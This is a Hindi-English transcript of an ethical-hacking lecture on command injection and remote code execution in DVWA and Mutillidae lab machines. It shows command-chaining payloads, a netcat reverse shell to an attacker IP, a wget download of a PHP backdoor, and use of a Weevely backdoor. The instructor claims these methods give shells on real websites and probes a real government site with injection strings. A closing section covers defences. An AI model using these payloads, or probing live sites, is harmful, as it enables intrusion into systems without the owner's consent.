ओके स्टूडेंट्स, सो अभी हम लोग जानते हैं रिमोट कोड एग्जीक्यूशन या कोड एग्जीक्यूशन या कमांड एग्जीक्यूशन। ठीक है, तो यहाँ पे हम लोग जानेंगे इस वल्नरेबिलिटी के बारे में। पिछली बार हमारी वॉइस रिकॉर्ड नहीं हो पाई थी, तो दैट्स वाई मैं वापस से रिकॉर्ड करके आप लोगों को दे रहा हूँ। सबसे पहले जानते हैं व्हाट इज कोड एग्जीक्यूशन और कमांड एग्जीक्यूशन। ओके, सो remote code execution or code execution is when an attacker targets a computing device and make changes remotely, no matter where the device is located. RCE is a broad category of attack, can have minor effect of victim systems, but they can also be quite serious. ओके, सो दैट मीन्स कि रिमोट कोड एग्जीक्यूशन में जब एक अटैकर टारगेट को एक्सेस करता है, उसके कंप्यूटर डिवाइस को एक्सेस करता है, ठीक है, रिमोटली मेक रिमोटली चेंजेस करके, ठीक है। तो अब ये इससे मैटर नहीं करता कि उसका डिवाइस कहाँ पे है, ठीक है, कहीं पे भी हो सकता है, क्योंकि यहाँ पर आरसीई या कमांड एग्जीक्यूशन रिमोटली परफॉर्म किया जाता है, कहीं से भी बैठ के कर सकता है वो। तो अगर इसको आप एक शॉर्ट वे में, एक बेटर वे में अंडरस्टैंड करना चाहो तो अलाउ एन अटैकर टू एग्जीक्यूट ओएस कमांड्स, और विंडोज और लाइनक्स के कमांड्स हो सकते हैं। कैन बी यूज टू गेट अ रिवर्सल, रिवर्सल के लिए हम लोग ट्राई कर सकते हैं, ओके, नो मैटर व्हाट। सो नाउ, और अपलोड कर सकते हैं एनी फाइल विद द हेल्प ऑफ wget कमांड। ओके, कोड एग्जीक्यूशन परफॉर्म कमांड्स अटैच्ड इन द रिसोर्सेज में। ये मैं कमांड्स वगैरह यूज़ कर रहा हूँ वो सारे आप लोगों को मिल जाएंगे रिवर्सल वगैरह के, और मैं रेफरेंस भी दे दूंगा कहाँ से आप लोग रिवर्सल वगैरह आप लोग जनरेट कर सकते हैं, ठीक है, एंड उसको वन बाय वन ट्राई कर सकते हैं कौन सा काम किया आपके उसमें। बट जो मैं बताऊंगा आपको वो मोस्ट ऑफ द टाइम आपके उसमें केसेस में काम कर जाएगा, डोंट वरी। फिर हम बात करते हैं डिफरेंस बिटवीन कोड एग्जीक्यूशन या कमांड एग्जीक्यूशन और कमांड इंजेक्शन, ठीक है। तो what is code execution? So this attack different from code injection in that code execution allow attacker to add their own code that is then executed by application, ठीक है, जिसमें लाइक अटैकर के द्वारा एक कोड लिखा जाता है जो कि एप्लीकेशन के द्वारा एग्जीक्यूट किया जाता है बैकएंड पे। एंड कमांड इंजेक्शन के, सो कमांड इंजेक्शन, ठीक है, कमांड इंजेक्शन, the attacker extend the default functionality of the application which executes system commands without the necessity of injecting codes. That means कि इसमें by default जो कह सकते हो फंक्शनैलिटी होती है वेब एप्लीकेशन की या एप्लीकेशन की, उसकी मदद से जो कि सिस्टम के कमांड को एग्जीक्यूट कराया जाता है बिना कोई कोड को इंजेक्ट करें। ओके, इसमें नेसेसरी नहीं है कि कोड को इंजेक्ट किया जाए। ओके, सो माइग्रेटिंग, अब इसको तो माइग्रेट कैसे कर सकते हो इसको हम बाद में जानेंगे, ठीक है। सबसे पहले हम लोग अपना लैब वगैरह देख लेते हैं। सो जस्ट वेट अ मिनट, मेरे को चार्जर कनेक्ट करना है। एंड ओके, सो अभी हम लोग करते हैं हमारा वर्चुअल मशीन, वर्चुअल एनवायरनमेंट ओपन करते हैं, मेटास्प्लोरेटेबल, पावर ऑन, वेट फॉर अ मिनट, स्टार्ट हो रहा है, स्टार्ट होते ही हम लोग परफॉर्म कर देंगे। तब तक के लिए हम लोग अपना और ये ब्रेव ब्राउज़र ओपन कर लेते हैं विथ, ठीक है, यहाँ पे हमारा खुला ही है कमांड एग्जीक्यूशन के लिए। अब ब्राउज़र भी खोल लेते हैं। ओके, ओके, सो यहाँ पे कमांड एग्जीक्यूशन पे आ जाओ आप लोग, और एडमिन एंड पास कमांड एग्जीक्यूशन हाई है, तो सबसे पहले इसको लो कर लेते हैं, ठीक है। तो अब आपको ये देखना है कि आप लोगों को हिट एंड ट्राई करना है कि लाइक यहाँ पे अगर आप जैसे वेब सर्वर में कहीं पे भी
कमांड को एग्जीक्यूट करा पा रहे और वो रिजल्ट बैकएंड के रिजल्ट हमको ला के दे रहा है समथिंग, कुछ आपको लगता है कि यहाँ पे ऐसा फंक्शनैलिटी यूज हो सकता है, तो आप लोग हिट एंड ट्राई कर सकते हो। ठीक है, क्योंकि यहाँ पे क्या होता है, रिमोट कोड एग्जीक्यूशन जो रहता है या कमांड एग्जीक्यूशन, कोड एग्जीक्यूशन, ठीक है, तो यहाँ पे कौन कौन से डेंजरस फंक्शन है जो यूज कर रहे होते हैं। ठीक है, कुछ डेंजरस फंक्शन होते हैं जैसे कि एग्जीक्यूट होता है, शेल एग्जीक्यूट होता है, पास थ्रू होता है, सिस्टम होता है। तो ये कुछ फंक्शंस हैं जिनकी हेल्प से कह सकते हो कि बैकएंड पे कमांड को एग्जीक्यूट करा जाता है विद द हेल्प ऑफ दिस वेब एप्लीकेशन और एप्लीकेशन। तो अब यहाँ पे हम करते क्या कि यहाँ पे हमसे बोला गया एक आईपी डालो। ठीक है, तो हम आईपी डाल देते हैं। ठीक है, एंड जस्ट सबमिट। तो यहाँ पे ये पिंग करेगा, पिंग किया इसने, ये देखो। एंड यहाँ पे हम अगर यहाँ पे कमांड एग्जीक्यूशन पे हम लोग करते गए कि हमको यहाँ पे चाहिए कि हम जो अपना कमांड दें, जैसे कि अगर मैं यहाँ पे नॉर्मल ls दे देता हूँ तो यहाँ पे कमांड काम नहीं करेगा, क्योंकि उसको क्या चाहिए, आईपी तो चाहिए ही चाहिए इसको। तो अगर मैं आईपी के साथ डालता हूँ ls तब देखता हूँ तो भी काम नहीं करेगा। तो अब हमको चाहिए कि पहले आईपी एग्जीक्यूट हो देन हमारा कमांड एग्जीक्यूट हो। ठीक है, और अगर एक बार को आईपी एग्जीक्यूट ना भी हो और हमारा एग्जीक्यूट हो रहा है तो भी चलेगा। ठीक है, तो अब हम दो कमांड को एग्जीक्यूट कराने के लिए बेसिकली करते क्या है, जूम इन कर लेता हूँ ताकि आप लोग को बेटर वे में दिखे। ओके, तो यहाँ पे इसमें मैंने लिखा ls और मेरे को चाहिए कि मैं एक और कमांड टाइप करूं। ठीक है, जैसे कि मैं ls के साथ एक और कमांड टाइप करना चाहता हूं तो उसको मैं सेमीकोलन से हटा सकता हूं, मतलब सेपरेट कर सकता हूं कि पहले ये चला दो फिर उसके बाद ये चला दो, तो सेमीकोलन उसके बीच में डिवाइडर का काम कर रहा है। ठीक है, और हम एंटर कर देते हैं तो देख सकते हो कि यहाँ से हमको ये सारी चीज़ें देखने को मिली। ठीक है, ये सारी ओके। तो अब यहाँ पे क्या करना है कि यहाँ पे ये भी कमांड जो है हमारा pwd वो भी काम कर गया। ठीक है, तो अब जैसे कि हमारे पास pwd कमांड काम कर गए, तो ऐसे अगर हम और चाहें तो हम यहाँ पे डबल एंड लगा सकते हैं तो भी वही सेम काम कर रहा है, सिंगल एंड पे भी वही सेम काम करेगा। और अगर हम डॉलर लगाएं तो यहाँ पे कह सकते हो कि नहीं काम कर रहा है। चलो, एट द रेट ये भी काम नहीं कर रहा, तो एट द रेट तो फिलहाल तो फालतू का है, वो नहीं काम। पाइप लगा देंगे तो काम कर रहा है, पाइप में बस हमारा दूसरा काम कर रहा है। ठीक है, ओके। तो अब हम करेंगे क्या कि यहाँ पे वही सेम चीज़ लगाएंगे, सेमीकोलन और ls लगा दिया मैंने, सबमिट कर दिया। पहले तो हमने आईपी दी, फिर हमने ls कमांड दिया, तो यहाँ पे देखो हमको देखने को लग गया, देखने को मिल गया हमारा रिजल्ट, पिंग भी काम कर गया, हमारा फाइल्स भी दिखने लग गई। तो दैट मीन्स कि हम लोग यहाँ पे चीज़ों को एग्जीक्यूट करा सकते हैं। ठीक है, तो अभी हम करते क्या कि एक मेथड है जैसे कि हमने यहाँ पे देखा था अभी कि अपलोड फाइल कर सकते हैं wget कमांड के थ्रू, तो हम वो भी ट्राई करके देख लेते हैं। ठीक है, तो यहाँ पे रिवर्स शेल तो हम लोग नॉर्मल जैसे कि इस कमांड से भी ले सकते हैं। यहाँ पे netcat का nc-e/bin/bash 192.168.29.51.4455। ठीक है, और अगर मैं यहाँ पे लिसनर ऑन कर दूं, ओ सॉरी, ठीक है, तो अगर हम अभी यहाँ पे सबमिट करते हैं देन बैक जाते हैं तो यहाँ पे देखो कनेक्ट हो गया। ठीक है, सो यहाँ पे कनेक्ट तो हो गया, बट कई बार होता है जैसे कि अगर मैं ये करता हूँ तो यहाँ पे देखो लिनक्स मेटास्प्लोइटेबल ये सबको दिखने लग गया। तो बट अगर कई बार होता है हमारे पास कि ये कमांड काम नहीं करते हैं, तो अब हम क्या कर सकते हैं
हम एक्चुअली कर सकते हैं कि यहाँ पे wget कमांड टाइप करो, ठीक है। जैसे कि exe यहाँ पे है तो यहाँ पे wget कमांड, यहाँ पे हम क्या करते हैं और यहाँ पे wget की है, एंड यहाँ पे मैं पाइथन का HTTP सर्वर चालू कर देता हूँ जहाँ पे मेरा बैकडोर है, यानी cd shell ls hexa.php। तो यहाँ पे मैं पाइथन का सर्वर स्टार्ट कर देता हूँ, ठीक है। और अगर मैं अपनी आईपी एड्रेस को एक्सेस करूं, ये देखिए, तो यहाँ पे हम लोग एक्सेस कर पा रहे हैं। वही इसके आगे स्लैश hexa.php लगा दे तो इसी फाइल पे हमारा बैकडोर है जो सेफ है। तो हम यहाँ पे जाते हैं और wget v कर देते हैं और सबमिट कर देते हैं। तो यहाँ पे काम तो कर गया। अब यहाँ पे वापस से ls करके देखते हैं कि हमारा जो बैकडोर है वो आया कि नहीं। तो एज ए कैन सी कि यहाँ पे hexa.php आ चुका है। अब hexa.php आ चुका है, दैट मीन्स कि अब हम इसको एग्जीक्यूट करा सकते हैं। तो अगर ये अभी हम अगर pwd देखें किस डायरेक्टरी में है ये, सॉरी यहाँ पे pwd, तो ये वार एग्जीक्यूट यहीं पे है, ठीक है, यानी यहीं पे ये सेव रखा है यानी एग्जीक्यूट। अब यहाँ पे अगर हम hexa.php करें तो यहाँ पे आप लोग देख सकते हो, ठीक है। अब ये कह सकते हो कि ये जो है ये मेरा एक वीवली का शेल है। वीवली क्या है? एक टूल है जो कि आपको बैकडोर्स जनरेट करके देता है पीएचपी के, ठीक है। जिसको नहीं आती है पीएचपी प्रोग्रामिंग लैंग्वेज या खुद से वो नहीं बना सकता है शेल वगैरह, तो इसको यूज़ कर सकते हैं। इसमें पोर्ट फॉरवर्डिंग की भी ज़रूरत नहीं रहती, तुम रियल लाइफ वेबसाइट में भी इसे सीधा शेल ले सकते हो। तो अब वीवली जनरेट, तो अब यहाँ पे करना क्या है, सबसे पहले वीवली इसका अगर एक बैकडोर जनरेट करना है तो आपको ये कमांड देनी पड़ेगी। अब कमांड का मतलब बता देता हूँ। वीवली जो कि टूल का नेम है, जनरेट यानी हमको जनरेट करना है, और ये 1 2 3 4 5 है पासवर्ड। जब हम कनेक्ट करेंगे इससे तो पासवर्ड भी हमको मेंशन करना रहता है, तो ये पासवर्ड देना है। एंड ये पाथ की कहाँ पे आपको जनरेट करना है, तो इतना करने के बाद कर लिया, ठीक है। अब यहाँ पे आपको वो यूआरएल को कॉपी करना है जहाँ पे आपका बैकडोर है, आपने कॉपी किया और यहाँ पे लाके पेस्ट कर दिया और पासवर्ड भी दे दिया 1 2 3 4 5 एंड हिट एंटर एंड टाइप हेल्प। और अगर यहाँ पे हमको सारे कमांड्स वगैरह देखने लगते हैं ये सारे, दैट मीन्स हम लोग सक्सेसफुली कनेक्ट हो चुके हैं। देखो www डेटा, ये देखो ये हमारा आईपी और इस डायरेक्टरी पे हैं अभी हम। तो अब यहाँ पे हम लोग कह सकते हो सक्सेसफुली यहाँ पे, तो अगर हम ये कमांड टाइप करते हैं तो एल होस्ट और एल पोर्ट भी यहाँ पे हमको मेंशन करना पड़ेगा, ठीक है। एग्जीक्यूट रिवर्स टीसीपी शेल, दैट मीन्स कि यहाँ पे हमको पोर्ट और वो भी मेंशन करना पड़ेगा कि लोकल होस्ट का पोर्ट और यहाँ पे पोर्ट टू स्पॉन, ठीक है। तो बाकी और आप लोग यहाँ पे और भी कमांड हैं जो कि आप लोग परफॉर्म करके देख सकते हो। डाउनलोड एंड यूआरएल फाइल, वेब डाउनलोड यानी यूआरएल से कुछ डाउनलोड कर सकते हो। अपलोड फाइल टू रिमोट फाइल सिस्टम, फाइल अपलोड सर्वर पे कोई फाइल डाउनलोड अपलोड कर सकते हो, ठीक है। एंड यहाँ पे और बहुत सारी चीज़ें हैं जो कि कर सकते हो। शेल एसयू से आप सुपर यूज़र से चीज़ों को वो कर सकते हो, ठीक है। और बाकी यहाँ पे और भी बहुत सारी चीज़ें हैं जो कि आप कर सकते हो। अगर सिस्टम इन्फो में कॉपी करके दिखाऊं तो ये देखो, हो एम आई www डॉक्यूमेंट रूट www गेटा होस्ट नहीं दिखाया, pwd ओपन नहीं, सेफ मोड फॉल्स, स्क्रिप्ट ये स्क्रिप्ट फोल्डर, ये यूज़र नेम ओएस लिनक्स क्लाइंट आईपी, ये मैक्स एग्जीक्यूशन टाइम 30, पीएचपी सेल्फ, ये सारी चीज़ें हमको पीएचपी का वर्जन मालूम चल गया। तो ऐसे यहाँ पे रिवर्स शेल लिया जाता है रियल लाइफ वेबसाइट में भी, ठीक है। और भी यहाँ पे कई सारी चीज़ें हैं जो कि आप लोग ट्राई कर सकते हो, ठीक है। जैसे कि इसमें नेट मेल यानी मेल सेंड कर सकते हो किसी को, एंड इंस्टॉल पीएचपी प्रॉक्सी
PHP प्रॉक्सी ऑन द टारगेट, PHP की प्रॉक्सी को इंस्टॉल करा सकते हो, TCP पोर्ट स्कैन कर सकते हो, नेट स्कैन करके पेस्ट किया, हिट एंटर, तो पोर्ट फॉर एग्जांपल ये, अच्छा ओके, नेट स्कैन, एड्रेसेस यानी IP एड्रेस 192.168.128.131 एंड यहाँ पे हम पोर्ट दे देते हैं 80 और 443, ठीक है। ओके, यहाँ पे स्पेस नहीं, कॉमा देना है, हिट एंटर। ओके, अभी भी नहीं काम आया, प्रिंट नेट स्कैन एड्रेस और पोर्ट, अच्छा तो यहाँ पे हमको बस एड्रेस नहीं देना है, तो यहाँ पे बता रहा है कि 80 खुला है बट 443 नहीं खुला है, तो यहाँ पे ऐसे सारी चीज़ें कर सकते हो आप लोग। तो मैं अब इससे एग्जिट हो जाता हूँ, बैक, ओके, इसमें कोई कमांड नहीं होगा तो ऐसे, ठीक है। तो देखा आप लोगों ने कैसे हम लोग वीवली से एग्जीक्यूट करा सकते हैं। एंड जस्ट वापस से जाते हैं एंड अभी हम लोग यहाँ पे देखते हैं। सो यहाँ पे अभी हम लोग देखते हैं, वापस बैक जाते हैं और यहाँ पे हम लोग DBW सिक्योरिटी को हाई कर देते हैं, थोड़ा और बढ़ा देते हैं मीडियम पे, एंड जस्ट यहाँ पे हम लोग वापस हमारे कमांड एग्जीक्यूशन पे जाते हैं और वही सेम चीज़ दोहराते हैं और देखते हैं होता है, नहीं हुआ, यानी यहाँ पे ये ब्लैक लिस्ट है। अब आप लोगों को और चीज़ें चेक करने, डबल एंड लगाना है यहाँ पे, ठीक है, और देखने क्या क्या चीज़ें ब्लैक लिस्ट है। ओके, ये भी बैन है, पाइप लगाना है यहाँ पे, सिंगल हैंड भी काम कर जाएगा बट पाइप दिखाना चाहता हूँ, पाइप यहाँ पे देखो काम कर जा रहा है, बट ओनली सिर्फ यही सारी चीज़ें आ रही है। बट हमको क्या करना है, हमको तो अपनी कमांड एग्जीक्यूट करने से मतलब है, जो बाय डिफ़ॉल्ट कमांड एग्जीक्यूट होना है, नहीं हो रही है नहीं हो रही है, हमसे उसको मतलब हम जो चाहते हैं वो एग्जीक्यूट हो रहा है, देन हमने सक्सेसफुली वहाँ पे रिमोट कोड एग्जीक्यूशन या कमांड या कोड एग्जीक्यूशन हमने वल्नरेबिलिटी निकाल ली। ओके, तो वापस से यहाँ पे ये मालूम है हमको ये शेल है, तो तुम इसके कोई अदर डायरेक्टरी पे भी कर सकते हो, ठीक है, लाइक ये करके wget करके, ठीक है, ये hexa.php कहाँ पे देना है उसके पाथ दे दो, यहाँ से आगे करके ऐसे स्लैश वहाँ पे आ जाएगा, और क्या नाम से देना है वो दे सकते हैं। एंड जस्ट सिंपल यही था, एंड जस्ट यहाँ पे ये n/pipe एंड nc-e/bin bash 192.168.29.51 एंड पोर्ट नंबर 4445। तो इस बार हम लोग जाते हैं, चलो 555 पे ओपन कर लेते हैं, 4 times 5 एंड हिट एंटर, एंड जैसे यू कैन सी कि यहाँ पे हमको कनेक्शन मिल गया। तो आप यहाँ से भी wget करके कमांड को कहीं पे भी अपना बैकग्राउंड वो कर सकते हैं, बट आप मेक श्योर करना कि जहाँ यहाँ पे आप एग्जीक्यूट कर रहे हो वो आप लोग यहाँ क्लाइंट साइड पे वेब सर्वर पे उसको एक्सेस कर पाओ, ठीक है, तभी कह सकते हो कि आप लोग उस बैकडोर को एक्सेस कर पाओगे। वरना अगर मेटास्प्लॉइट का है देन इट इज़ फाइन, देन आप लोग यहाँ पे EXEC देकर यहाँ पे hexa.php कर सकते हो, ठीक है, बट वहाँ पे था नहीं, सो दैट्स वाई वापस क्या करते हैं, सबमिट, एंड यहाँ पे आ गया, तो वापस से EXEC करके जैसे कि hexa.php कर दिया तो यहाँ पे आ जाओगे, बट वो फाइल है नहीं, सो दैट्स वाई वो एग्जीक्यूट नहीं हो रही है। बस देखो ये hexa.php, तो यहाँ पे इससे तो एग्जीक्यूट होने से रहा, एंड आप लोग ट्राई कर सकते हो यहाँ पे, और भी अपनी अपनी क्रिएटिविटी लगा सकते हो आप लोग, ठीक है, कि आप लोगों को क्या करना है, कैसे करना है, एंड ऑल ओवर दीज थिंग्स। ओके, सो यहाँ से अगर आप जैसे कि CD/ में चले जाते हो ls, तो यहाँ पे आपको देखने को मिलेगा क्या, कई बार आप लोग टेम्प फोल्डर पे आप लोग अपना एग्जीक्यूटेबल डाल सकते हो और वहाँ पे एग्जीक्यूट करा सकते हो। ओके,
बट अभी के लिए हम लोग नहीं करेंगे, ठीक है, क्योंकि हमको चाहिए कि हम क्लाइंट साइड से एक्सेस कर पाएँ इसका वेबसाइट इंटरफेस से। तो इसलिए अब वहाँ से अगर हम लोग टेम्प में डालेंगे तो वहाँ से हम लोग एक्सेस नहीं कर सकते। बट अगर जैसे कि आप लोग सी वगैरह खेले तो वहाँ पे आप लोग डाल सकते हो, क्योंकि टेम्परेरी टेम्प फोल्डर में टेम्परेरी फाइल्स रहती हैं और वहाँ पे वो अलाउ करता है कि कोई भी फाइल्स को इंस्टॉल करके एग्जीक्यूट करा सकते हो एंड ऑल ओवर दिस थिंग्स। तो रिवर्स लेने के लिए यहाँ पे भी कोई फाइल आप वो कर सकते हो, शेल बैश फाइल डाल सकते हो, शेल फाइल डाल सकते हो, शेल स्क्रिप्ट डाल सकते हो, कुछ भी डाल सकते हो, डॉट एस एच जो एक्सटेंशन होता है उसकी फाइल्स। ओके, cd/var, यहाँ पे आप लोग अब जा सकते हो DVWA मटेरियल, यहाँ पे ये सारी चीज़ों पे, ठीक है, कि यहाँ पे क्या क्या ऑल ओवर चीज़ें हैं। तो अब यहाँ पे ये सारी चीज़ आप लोग क्लाइंट साइड से एक्सेस कर सकते हो। तो यहाँ पे आप लोग कह सकते हो कि आप यहाँ पे शेल को वो कर सकते हो, जैसे कि अगर मैं यहाँ पे wget करता हूँ, यहाँ पे गया, कॉपी किया, hit enter and ls, and as you can see hexa.php, and if you go to the IP, एंड यहाँ पे आप अगर /hexa PHP करते हो तो यहाँ पे देखो कोई एरर नहीं है, दैट मीन्स कि यहाँ पे सक्सेसफुली आ गया है, ठीक है। तो आप लोग यहाँ से भी एक्सेस कर सकते हो अब, ठीक है। बस आपको ये ध्यान देना है कि आप क्लाइंट साइड से उसको एक्सेस कर पाओ, तभी आप उसको एग्जीक्यूट करा पाओगे वीबली पे। ओके, सो ऑल ओवर यहाँ पे हो ही गया। अभी हम चलते हैं मटेरियल का देखने, मटेरियल में क्या सिक्योरिटी लगा रखी है, इंप्लीमेंट कर रखी है। मटेरियल पे वहाँ पे कह सकते हो कि आपको wget करके रिवर्स लेना पड़ेगा, यहाँ पे नेटकैट का काम नहीं करता है। मटेरियल पे गए एंड यहाँ पे हम यहाँ पे गए एंड इंजेक्शन एंड कमांड इंजेक्शन, ओके, एंड यहाँ पे और तो कुछ है नहीं, कमांड इंजेक्शन DNS लुकअप एंड यहाँ पे google.com, सो यहाँ पे ये हो रहा है। तो डैट मीन्स google.com ls, तो यहाँ पे देखो फाइल्स आ रही हैं, ठीक है। डैट मीन्स कि यहाँ पे आप लोग अब ये भी डाउनलोड कर सकते हो। तो अगर मैं यहाँ पे अगर google.com के साथ wget पेस्ट, कॉपी पेस्ट, लुकअप DNS, ये हो गया, एंड वापस से ls करके देखते हैं। यहाँ पे हमारा एक hexa.php आ गया, OPQR, H से कहाँ पे है, ये देखो hexa.php। तो अगर हम इसको कॉपी करते हैं और पेज पे अगर DNS लोगों की जगह पे हम hexa.php कर देते हैं तो यहाँ पे दैट मीन सक्सेसफुली आ रहा है। और अगर हम इसे कॉपी करें एंड इससे हम लोग वीवली ये करते हैं, बट यहाँ पे हम लोग कह सकते हो कि ये URL देंगे एंड हिट एंटर एंड टाइप हेल्प, एंड एज यू कैन सी कि वी आर इनसाइड द मटेरियल। जब हम लोगों ने लाइव क्लास में देखा था तो वहाँ पे हम लोग मटेरियल पे नेटकैट से रिवर्सल नहीं ले पा रहे थे। सो मैंने सोचा कि मैं इससे दिखा दूँ, इससे तो हम ले ही सकते हैं। ओके, तो यहाँ पे आप लोगों ने ये देखा कि हमने सक्सेसफुली कैसे ईजी तरीके से हमने ये रिवर्सल ले लिया। ओके, सो मैं इसको कंट्रोल-C कर देता हूँ एंड यहाँ पे अब व्हाट इफ की अगर हम यहाँ पे थोड़ी टूगल हिंट नहीं, टूगल सिक्योरिटी, और टूगल सिक्योरिटी तो यहाँ पे बता रखा है कि विंडोज यूजर्स एंड टू लिंक कमांड, लिनक्स यूजर्स टू लिंक कमांड एंड ये एज अ कमांड सेपरेटर। तो ठीक है, तो यहाँ पे ये हिंट आ गया है टूगल सिक्योरिटी लेवल 1। तो अगर अब यहाँ पे हम वही सारी चीज़ें टर्म करें, यहाँ पे क्लाइंट साइड की सिक्योरिटी लगी है ये, ठीक है, ये देखो। तो हम करेंगे क्या कि सिर्फ google.com लिखेंगे एंड ब्राउज़र पे जाएंगे और प्रॉक्सी करके इंटरसेप्ट ऑन करेंगे एंड लुकअप DNS एंड यहाँ पे हम लोग टाइप कर देंगे ls ऐसे फॉरवर्ड। तो अब यहाँ पे आप लोग देख सकते हो कि यहाँ पे कमांड का काम कर रहा है।
ठीक है, तो आप लोग ऐसे ही कर सकते हो, लाइक इंटरसेप्ट ऑन करो और यहाँ पे वापस google.com लुकअप DNS, यहाँ पे जाओ google.com एंड यहाँ से कॉमा डब्ल्यू गेट और URL पेस्ट कर दो, वाली जो डब्ल्यू गेट वाली है, ठीक है, वहाँ पे। एंड इसको आप लोग थोड़ा इधर से करके पूरा ऐसे करके कंट्रोल U कर लेना, ठीक है, ताकि इनकोड हो जाए और कोई एरर ना आए। फॉरवर्ड कर दो एंड जस्ट नॉर्मल, ओके। तो ट्राई wget हेल्प फॉर मोर ऑप्शन। देखो wget यहाँ पे मिसिंग URL, दैट मीन्स wget कमांड तो जो काम कर गया था, ओके। सो यहाँ पे सक्सेसफुली यहाँ पे काम कर पा रहा है। एंड नाउ आप लोग यहाँ पे बैकडोर्स वगैरह एग्जीक्यूट करा सकते हो वो करके, ठीक है, PHP के बैकडोर्स को एग्जीक्यूट करा सकते हो यहाँ पे करके। एंड यहाँ से फाइल को एक्सेस कर सकते हो पेज, क्योंकि ये भी पेज यहीं से उठा रहा है जो बैकएंड पे जहाँ पे अपलोडेड है, ओके। तो यहाँ से हमने सक्सेसफुली देखा कि कैसे यहाँ पे हम लोग कर सकते हैं। एंड हम लोगों ने यहाँ पे देखा कि ये सक्सेसफुली यहाँ पे हम लोग रिवर्स कनेक्शन और रिवर्स शेल भी ले लिए सक्सेसफुली। सो अब यहाँ पे हम लोग बात करते हैं इन सब चीज़ों को हम लोग फिक्स कैसे कर सकते हैं। कई बार आप लोगों से पूछा जा सकता है कि इस चीज़ को आप लोगों ने फाइंड तो कर लिया, बट अब इसको फिक्स कैसे करोगे वो बताओ आप, ठीक है। तो यहाँ पे सबसे पहले डोंट यूज डेंजरस फंक्शंस। डेंजरस फंक्शंस जो हमने यहाँ पे देखे थे, शेल अंडरस्कोर exec एग्जीक्यूट पास थ्रू सिस्टम, ऐसे फंक्शंस को यूज ना करें। और कर भी रहे हैं तो क्या करें, तो वहां पे फिल्टर करो कि यूजर ने क्या इनपुट दिया है एग्जीक्यूट कराने से पहले। लाइक तुमको वहां पे चेक करना है कि सबसे पहले तुमको सीधा एग्जीक्यूट नहीं करा देना है, सबसे पहले उसको फिल्टर करना है कि यूजर ने क्या दिया। अगर कुछ मलिशियस दिया है तो उसको वहीं पर रोक दो, ठीक है। ये बात करते हैं ऑलवेज यूज वेब एप्लीकेशन फायरवॉल, ठीक है। वेब एप्लीकेशन फायरवॉल को इंप्लीमेंट कर सकते हैं, क्योंकि वेब एप्लीकेशन फायरवॉल जैसे देखते हैं कि यहाँ पे मलिशियस स्ट्रिंग्स आई हैं तो वो तुरंत डिटेक्ट कर लेगा। अगर हम इसका लाइव एग्जांपल देखें किसी वेबसाइट में, तो site.pk and in URL ISPR, पाकिस्तान की गवर्नमेंट वेबसाइट है ये वाली, ठीक है, इंटर सर्व अभी कौन सी है, जो भी है। अब यहाँ पे हम लोग कर देंगे सर्च पैरामीटर। अगर यहाँ पे हम कुछ भी डालते हैं, सिंगल कोट या कह सकते हो wget सर्च किया तो अच्छा wget यहाँ पे काम कर जा रहा है। तो जस्ट यहाँ पे अगर हम कुछ भी डाल दें जैसे कि पास थ्रू, ठीक है, हिट एंटर, तो ये देखो ब्लॉक कर दिया तुरंत, उसने डिटेक्ट कर लिया कि यहाँ पे सिस्टम्स के कमांड एग्जीक्यूट कराए जा रहे हैं, ठीक है। तो उसने तुरंत देखा और तुरंत डिलीट कर दिया, मतलब डिलीट नहीं किया, ब्लॉक कर दिया, ठीक है। तो यहाँ पे इसलिए हम लोगों को फायरवॉल को इम्प्लीमेंट करना चाहिए। हालांकि बाईपास हो जाते हैं बट स्टिल यहाँ पे यूज़ करना चाहिए, ठीक है। और क्लाइंट साइड के कोड पे भी डिपेंड करता है। सो स्टूडेंट्स, आई होप कि आप लोगों को समझ आ गया होगा जो भी हमने आज की क्लास में देखा। सो टिल देन कीप लर्निंग, कीप ग्रोइंग। थैंक यू। आज हम लोग मिलते हैं अपनी नेक्स्ट क्लास में।